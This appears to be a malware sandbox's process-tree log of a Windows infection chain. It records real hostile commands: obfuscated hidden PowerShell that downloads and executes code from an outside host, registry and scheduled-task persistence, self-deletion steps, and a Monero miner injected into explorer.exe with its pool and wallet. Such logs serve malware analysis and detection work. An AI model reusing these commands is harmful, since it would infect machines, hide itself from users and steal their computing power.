C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit10⤵PID:5976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "foradvertising.exe" /f11⤵
- Kills process with taskkill
PID:6608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"9⤵
- Executes dropped EXE
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a10⤵PID:4220
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵PID:588
-
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7219⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\is-ILV3S.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-ILV3S.tmp\IBInstaller_74449.tmp" /SL5="$3050C,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵PID:7888
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-RL49L.tmp\{app}\microsoft.cab -F:* %ProgramData%11⤵PID:7788
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-RL49L.tmp\{app}\microsoft.cab -F:* C:\ProgramData12⤵PID:7248
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f11⤵PID:7224
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵PID:7808
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72111⤵PID:6864
-
-
C:\Users\Admin\AppData\Local\Temp\is-RL49L.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-RL49L.tmp\{app}\vdi_compiler"11⤵PID:6424
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-RL49L.tmp\{app}\vdi_compiler.exe"12⤵PID:7840
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 413⤵
- Runs ping.exe
PID:6296
-
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"11⤵PID:1492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=7209⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\is-SFETO.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFETO.tmp\vpn.tmp" /SL5="$5050C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵PID:6164
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵PID:1632
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵PID:5780
-
-
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵PID:6448
-
C:\Users\Admin\AppData\Local\Temp\is-I55VM.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-I55VM.tmp\stats.tmp" /SL5="$20350,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵PID:6656
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu2156de5489c19.exeThu2156de5489c19.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Users\Admin\AppData\Local\Temp\tmp9197_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp9197_tmp.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
PID:3628 -
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv7⤵PID:4996
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:5432
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv9⤵PID:5984
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u9⤵PID:3108
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u10⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u11⤵PID:6108
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u12⤵PID:2232
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u13⤵PID:6528
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u14⤵PID:5452
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
PID:6448
-
-
-
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵PID:5048
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu21568b0ab8.exeThu21568b0ab8.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:1308
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:6636
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:7124
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:6484
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:5932
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:5188
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:6264
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:7596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:592 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 592 -s 15648⤵
- Program crash
PID:5592
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:3292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 8088⤵
- Program crash
PID:6000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 8408⤵
- Program crash
PID:5740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 8968⤵
- Program crash
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 9688⤵
- Program crash
PID:4920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 9968⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 12168⤵
- Program crash
PID:4928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 11928⤵
- Program crash
PID:6240
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:4884
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2264 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:5836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "9⤵PID:5648
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe10⤵PID:6352
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe11⤵PID:6468
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵PID:6720
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵PID:7008
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵PID:6628
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
PID:7080
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exeFoxyIDM62s.exe10⤵PID:6580
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵PID:6776
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:5252 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:5856
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5420
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:5344
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5060 -
C:\ProgramData\1292461.exe"C:\ProgramData\1292461.exe"8⤵PID:6052
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:5692
-
-
-
C:\ProgramData\205327.exe"C:\ProgramData\205327.exe"8⤵PID:5920
-
-
C:\ProgramData\8708246.exe"C:\ProgramData\8708246.exe"8⤵PID:5292
-
-
C:\ProgramData\8096887.exe"C:\ProgramData\8096887.exe"8⤵PID:5152
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵PID:4908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵PID:2056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵PID:1264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu214ce31cede21.exeThu214ce31cede21.exe1⤵PID:1956
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit2⤵PID:6876
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu214ce31cede21.exe /f3⤵
- Kills process with taskkill
PID:4844
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:4260
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu214aaca5625.exeThu214aaca5625.exe1⤵
- Executes dropped EXE
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\is-B820F.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-B820F.tmp\Thu214aaca5625.tmp" /SL5="$20222,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu214aaca5625.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\is-3I5MT.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-3I5MT.tmp\46807GHF____.exe" /S /UID=burnerch23⤵
- Executes dropped EXE
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\ce-cc6f2-33f-a6bb3-ad90e2255ce5a\Pikijenylae.exe"C:\Users\Admin\AppData\Local\Temp\ce-cc6f2-33f-a6bb3-ad90e2255ce5a\Pikijenylae.exe"4⤵PID:3876
-
-
C:\Users\Admin\AppData\Local\Temp\53-68a97-10e-0f6ab-afe492843a0bc\Hovumomydae.exe"C:\Users\Admin\AppData\Local\Temp\53-68a97-10e-0f6ab-afe492843a0bc\Hovumomydae.exe"4⤵PID:5364
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ryzri42.1y3\GcleanerEU.exe /eufive & exit5⤵PID:5296
-
C:\Users\Admin\AppData\Local\Temp\0ryzri42.1y3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\0ryzri42.1y3\GcleanerEU.exe /eufive6⤵PID:5532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\shv2mx4o.lk4\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\shv2mx4o.lk4\installer.exeC:\Users\Admin\AppData\Local\Temp\shv2mx4o.lk4\installer.exe /qn CAMPAIGN="654"6⤵PID:4724
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\shv2mx4o.lk4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\shv2mx4o.lk4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630993219 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵PID:8160
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mftd4wrf.ynp\anyname.exe & exit5⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\mftd4wrf.ynp\anyname.exeC:\Users\Admin\AppData\Local\Temp\mftd4wrf.ynp\anyname.exe6⤵PID:5512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jhw2tghg.fhs\gcleaner.exe /mixfive & exit5⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\jhw2tghg.fhs\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jhw2tghg.fhs\gcleaner.exe /mixfive6⤵PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20gaf4za.ocz\autosubplayer.exe /S & exit5⤵PID:5724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCE6B3B74\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone1⤵
- Executes dropped EXE
PID:2200 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 6602⤵
- Program crash
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 6682⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 6762⤵
- Program crash
PID:5660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 8202⤵
- Program crash
PID:5164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 8842⤵
- Program crash
PID:5444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 9482⤵
- Program crash
PID:5900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 10922⤵
- Program crash
PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\is-TKA6L.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-TKA6L.tmp\setup_2.tmp" /SL5="$20312,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5324 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT2⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\is-ANGIH.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-ANGIH.tmp\setup_2.tmp" /SL5="$3033E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT3⤵PID:5824
-
C:\Users\Admin\AppData\Local\Temp\is-P456J.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-P456J.tmp\postback.exe" ss14⤵PID:1184
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss15⤵PID:4644
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"6⤵PID:6068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"7⤵PID:5968
-
-
-
C:\Users\Admin\AppData\Local\Temp\SdBV60qR2.exe"C:\Users\Admin\AppData\Local\Temp\SdBV60qR2.exe"6⤵
- Executes dropped EXE
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
-
C:\Users\Admin\AppData\Local\Temp\Mq90y7VSM.exe"C:\Users\Admin\AppData\Local\Temp\Mq90y7VSM.exe"6⤵PID:1760
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"7⤵PID:6880
-
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5820
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4108
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6996 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7032
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6352
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe1⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe2⤵PID:772
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4872
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5392
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1036
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6200
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4920
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 181FE3D14529035B4FF2E9BDA89299BB C2⤵PID:7284
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C36C16223855E7BA7D2D60C0B6AA53792⤵PID:2688
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:7816
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 86AA1B72E044ECB7AE0311F2361015F1 E Global\MSI00002⤵PID:7444
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7380
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7536
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7776 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:7796
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:6932 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\45CF.exeC:\Users\Admin\AppData\Local\Temp\45CF.exe1⤵PID:7884
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe1⤵PID:5116
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe2⤵PID:7712
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2232
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2716
-
C:\Users\Admin\AppData\Local\Temp\7E74.exeC:\Users\Admin\AppData\Local\Temp\7E74.exe1⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\7E74.exeC:\Users\Admin\AppData\Local\Temp\7E74.exe2⤵PID:2164
-
